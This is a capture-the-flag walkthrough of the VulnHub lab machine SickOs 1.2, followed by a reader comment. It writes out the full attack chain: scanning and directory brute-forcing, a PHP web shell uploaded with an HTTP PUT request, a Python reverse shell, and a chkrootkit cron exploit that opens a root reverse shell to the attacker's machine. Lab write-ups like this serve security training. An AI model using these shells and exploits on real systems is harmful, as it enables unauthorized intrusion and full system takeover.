Here is a complete walkthrough and tutorial on how to hack and penetrate SickOs 1.2 of VulnHub.
SickOS 1.2 Description:
SickOS 1.2 is a CTF (Capture the Flag) vulnerable machine from VulnHub which objective is to gain the highest privileges on the system and get the /root/7d03aaa2bf93d80040f3f22ec6ad9d5a.txt file.
SickOs 1.2 Walkthrough
SickOs 1.2 was found by conducting an Nmap ping sweep.
nmap -sP 192.168.216.1-254
Doing a quick Nmap scan, it was found that SickOS 1.2 port 22 and port 80 was open.
nmap -n 192.168.216.128
Browsing to http://192.168.216.128 shows that it was hosting a website.
Wfuzz, a tool for brute-forcing web applications was used to find and brute-force for any directories on SickOS 1.2 website.
Using Wfuzz, a directory named “test” was found.
wfuzz --hc 404 -c -z file,/usr/share/wfuzz/wordlist/general/big.txt http://192.168.216.128/FUZZ
Browsing to the “test” directory showed a directory listing web page and that SickOS 1.2 website was running on lighttpd/1.4.28.
Various exploits and vulnerabilities on lighttpd 1.4.28 was tested, however none of it worked for SickOs 1.2.
Upon checking for HTTP methods available on the directory “test” using cURL, it was found that it can be potentially vulnerable to HTTP PUT method exploit.
curl -v -X OPTIONS http://192.168.216.128/test
Learning this, SickOS 1.2 was tested if it was possible to create a simple backdoor web shell using the HTTP PUT method exploit.
curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://192.168.216.128/test/shell.php
The result shows that SickOS 1.2 was indeed vulnerable to HTTP PUT method exploit.
Browsing to the test directory showed that the webshell was successfully created.
The webshell was then tested if it was properly working by reading the “/etc/passwd” file of SickOS 1.2.
Seeing the contents of “/etc/passwd/” file proves that the web shell was indeed working.
The webshell was then used to run a reverse shell Python command while a Netcat was opened to listen for incoming connections. This resulted on gaining a shell with low privilege access.
nc -nlvp 443 http://192.168.216.128/test/shell.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket%28socket.AF_INET,socket.SOCK_STREAM%29;s.connect%28%28%22192.168.216.129%22,443%29%29;os.dup2%28s.fileno%28%29,0%29;%20os.dup2%28s.fileno%28%29,1%29;%20os.dup2%28s.fileno%28%29,2%29;p=subprocess.call%28[%22/bin/sh%22,%22-i%22]%29;%27
The low privilege shell was used to enumerate SickOS 1.2 which resulted on finding that a Chkrootkit version 0.49 was running on Crontab through “/etc/cron.daily“.
cd /etc/cron.daily ls -alF chkrootkit -V
Chkrootkit 0.49 privilege escalation exploit was then used to gain complete administrative access on SickOS 1.2.
A bash script named “update” was then created on the “/tmp” directory and changed its permissions to 777 to make it executable and remove any permission restriction while a Netcat listener was opened to wait for incoming connections.
printf '#!/bin/bash\nbash -i >& /dev/tcp/192.168.216.129/443 0>&1\n' >> /tmp/update chmod 777 /tmp/update nc -nlvp 443
After waiting for the Chkrootkit to run via Crontab, the root shell was obtained.
Browsing to the root directory, the target 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt has been found.
7d03aaa2bf93d80040f3f22ec6ad9d5a.txt contents: WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually. Thanks for giving this try. @vulnhub: Thanks for hosting this UP!.
SickOs 1.2 of VulnHub has been successfully hacked and exploited!
This was awesome. I like the way you used curl instead of msfvenom to create the shell file.